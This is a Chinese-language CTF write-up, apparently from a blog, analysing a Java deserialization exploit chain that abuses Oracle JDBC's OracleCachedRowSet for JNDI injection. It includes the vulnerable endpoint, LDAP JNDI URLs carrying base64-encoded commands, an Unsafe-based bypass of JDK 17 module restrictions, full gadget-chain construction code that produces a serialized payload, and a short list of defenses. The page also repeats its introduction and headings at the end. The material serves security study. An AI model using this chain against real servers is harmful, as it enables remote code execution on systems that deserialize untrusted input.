Oracle JDBC 利用链分析<\/h1>

前言<\/h2>
本文详细分析通过JDBCParty对Oracle数据库利用链的技术细节，重点探讨Oracle JDBC驱动中存在的安全漏洞及其利用方式。该分析基于一个Java安全攻防赛题目，其中涉及Oracle JDBC驱动的特定利用链。<\/p>

环境配置<\/h2>

依赖项分析<\/h3>

题目使用的关键依赖包括：<\/p>

<dependency><\/span>
<\/span><\/span>    <groupId><\/span>com.oracle.database.jdbc<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>ojdbc11<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>21.14.0.0<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><dependency><\/span>
<\/span><\/span>    <groupId><\/span>org.apache.tomcat<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>tomcat-jdbc<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>10.1.31<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><dependency><\/span>
<\/span><\/span>    <groupId><\/span>com.alibaba.fastjson2<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>fastjson2<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>2.0.37<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre>关键代码分析<\/h3>
题目核心控制器代码：<\/p>
@PostMapping<\/span>({<\/span>"\/dbtest"<\/span>})<\/span>
<\/span><\/span>public<\/span> ResponseEntity<<\/span>String><\/span> dbtest<\/span>(<\/span>String data)<\/span> {<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        User credentials =<\/span> (<\/span>User)<\/span> Utils.<\/span>deserialize<\/span>(<\/span>data);<\/span>
<\/span><\/span>        Class.<\/span>forName<\/span>(<\/span>this<\/span>.<\/span>driverClassName<\/span>);<\/span>
<\/span><\/span>        Connection connection =<\/span> DriverManager.<\/span>getConnection<\/span>(<\/span>this<\/span>.<\/span>url<\/span>,<\/span> credentials.<\/span>getUsername<\/span>(),<\/span> credentials.<\/span>getPassword<\/span>());<\/span>
<\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>    }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>漏洞利用链分析<\/h2>
Sink点分析<\/h3>
Oracle JDBC驱动中的OracleCachedRowSet<\/code>类存在JNDI注入漏洞：<\/p>
oracle.<\/span>jdbc<\/span>.<\/span>rowset<\/span>.<\/span>OracleCachedRowSet<\/span> oracleCachedRowSet =<\/span> new<\/span> OracleCachedRowSet();<\/span>
<\/span><\/span>oracleCachedRowSet.<\/span>setDataSourceName<\/span>(<\/span>"ldap:\/\/127.0.0.1:1389\/Basic\/Command\/Y2FsYw=="<\/span>);<\/span>
<\/span><\/span>oracleCachedRowSet.<\/span>getConnection<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>关键调用链：<\/p>

getConnection()<\/code>调用getConnectionInternal()<\/code><\/li>
内部处理数据源名称时触发JNDI查找<\/li>
<\/ol>
JDK高版本绕过<\/h3>
在JDK 17等高版本中，需要特殊配置才能利用JNDI注入：<\/p>
System.<\/span>setProperty<\/span>(<\/span>"oracle.jdbc.allowAbsoluteJNDIUrls"<\/span>,<\/span> "true"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>或者通过反射修改相关字段：<\/p>
Class unsafeClass =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.misc.Unsafe"<\/span>);<\/span>
<\/span><\/span>Field field =<\/span> unsafeClass.<\/span>getDeclaredField<\/span>(<\/span>"theUnsafe"<\/span>);<\/span>
<\/span><\/span>field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Unsafe unsafe =<\/span> (<\/span>Unsafe)<\/span> field.<\/span>get<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span>Module baseModule =<\/span> Object.<\/span>class<\/span>.<\/span>getModule<\/span>();<\/span>
<\/span><\/span>Class currentClass =<\/span> OracleSink.<\/span>class<\/span>;<\/span>
<\/span><\/span>long<\/span> addr =<\/span> unsafe.<\/span>objectFieldOffset<\/span>(<\/span>Class.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"module"<\/span>));<\/span>
<\/span><\/span>unsafe.<\/span>getAndSetObject<\/span>(<\/span>currentClass,<\/span> addr,<\/span> baseModule);<\/span>
<\/span><\/span><\/code><\/pre>利用链构造<\/h3>
完整利用链构造示例：<\/p>
\/\/ 1. 创建OracleCachedRowSet并设置恶意LDAP URL
<\/span><\/span><\/span><\/span>OracleCachedRowSet oracleCachedRowSet =<\/span> (<\/span>OracleCachedRowSet)<\/span> UnSafeTools.<\/span>newClass<\/span>(<\/span>Class.<\/span>forName<\/span>(<\/span>"oracle.jdbc.rowset.OracleCachedRowSet"<\/span>));<\/span>
<\/span><\/span>oracleCachedRowSet.<\/span>setDataSourceName<\/span>(<\/span>"ldap:\/\/127.0.0.1\/zETKBsNKJk\/Plain\/Exec\/eyJjbWQiOiJjYWxjIn0="<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 2. 通过反射设置必要字段
<\/span><\/span><\/span><\/span>UnSafeTools.<\/span>setObject<\/span>(<\/span>oracleCachedRowSet,<\/span> oracleCachedRowSet.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"monitorLock"<\/span>),<\/span> null<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>Vector aaa =<\/span> new<\/span> Vector<>();<\/span>
<\/span><\/span>aaa.<\/span>add<\/span>(<\/span>0<\/span>);<\/span>
<\/span><\/span>Vector bbb =<\/span> new<\/span> Vector<>();<\/span>
<\/span><\/span>bbb.<\/span>add<\/span>(<\/span>"TEST"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>UnSafeTools.<\/span>setObject<\/span>(<\/span>oracleCachedRowSet,<\/span> oracleCachedRowSet.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"matchColumnIndexes"<\/span>),<\/span> aaa);<\/span>
<\/span><\/span>UnSafeTools.<\/span>setObject<\/span>(<\/span>oracleCachedRowSet,<\/span> oracleCachedRowSet.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"matchColumnNames"<\/span>),<\/span> bbb);<\/span>
<\/span><\/span>UnSafeTools.<\/span>setObject<\/span>(<\/span>oracleCachedRowSet,<\/span> oracleCachedRowSet.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"metaData"<\/span>),<\/span> new<\/span> String[]{<\/span>"TEST"<\/span>});<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 3. 包装为POJONode以触发getter方法
<\/span><\/span><\/span><\/span>POJONode pojoNode =<\/span> new<\/span> POJONode(<\/span>oracleCachedRowSet);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 4. 构造最终利用对象
<\/span><\/span><\/span><\/span>EventListenerList list2 =<\/span> new<\/span> EventListenerList();<\/span>
<\/span><\/span>UndoManager manager =<\/span> new<\/span> UndoManager();<\/span>
<\/span><\/span>Vector vector =<\/span> (<\/span>Vector)<\/span> getFieldValue(<\/span>manager,<\/span> "edits"<\/span>);<\/span>
<\/span><\/span>vector.<\/span>add<\/span>(<\/span>pojoNode);<\/span>
<\/span><\/span>setFieldValue(<\/span>list2,<\/span> "listenerList"<\/span>,<\/span> new<\/span> Object[]{<\/span>InternalError.<\/span>class<\/span>,<\/span> manager});<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化并发送
<\/span><\/span><\/span><\/span>ByteArrayOutputStream bao =<\/span> new<\/span> ByteArrayOutputStream();<\/span>
<\/span><\/span>ObjectOutputStream objectOutputStream =<\/span> new<\/span> ObjectOutputStream(<\/span>bao);<\/span>
<\/span><\/span>objectOutputStream.<\/span>writeObject<\/span>(<\/span>list2);<\/span>
<\/span><\/span>String payload =<\/span> Base64.<\/span>getEncoder<\/span>().<\/span>encodeToString<\/span>(<\/span>bao.<\/span>toByteArray<\/span>());<\/span>
<\/span><\/span><\/code><\/pre>触发机制分析<\/h2>
Jackson触发方式<\/h3>
利用POJONode<\/code>触发getter方法：<\/p>

POJONode<\/code>继承自BaseJsonNode<\/code>，其toString()<\/code>方法会调用InternalNodeMapper.nodeToString()<\/code><\/li>
ObjectWriter.writeValueAsString()<\/code>方法会遍历bean对象的所有属性并调用getter方法<\/li>
最终触发OracleCachedRowSet<\/code>的getConnection()<\/code>方法<\/li>
<\/ol>
其他触发方式<\/h3>
除了Jackson，还可以通过以下方式触发：<\/p>

Fastjson反序列化<\/li>
直接调用getConnection()<\/code>方法<\/li>
通过其他会调用getter方法的框架或库<\/li>
<\/ol>
防御措施<\/h2>

升级Oracle JDBC驱动到最新版本<\/li>
在JDK高版本中保持默认的JNDI限制（不设置oracle.jdbc.allowAbsoluteJNDIUrls<\/code>）<\/li>
对反序列化操作进行严格的白名单控制<\/li>
使用安全的JDBC连接池配置<\/li>
<\/ol>
总结<\/h2>
该利用链展示了Oracle JDBC驱动中OracleCachedRowSet<\/code>类的安全问题，结合反序列化漏洞可以实现RCE。在高版本JDK环境下，虽然JNDI注入受到限制，但通过特定配置或反射修改仍可能被利用。开发者应关注此类安全问题，及时更新依赖并实施适当的安全防护措施。<\/p>

Oracle JDBC 利用链分析<\/h1>

前言<\/h2> 本文详细分析通过JDBCParty对Oracle数据库利用链的技术细节，重点探讨Oracle JDBC驱动中存在的安全漏洞及其利用方式。该分析基于一个Java安全攻防赛题目，其中涉及Oracle JDBC驱动的特定利用链。<\/p>

环境配置<\/h2>

漏洞利用链分析<\/h2>

触发机制分析<\/h2>

前言<\/h2>
本文详细分析通过JDBCParty对Oracle数据库利用链的技术细节，重点探讨Oracle JDBC驱动中存在的安全漏洞及其利用方式。该分析基于一个Java安全攻防赛题目，其中涉及Oracle JDBC驱动的特定利用链。<\/p>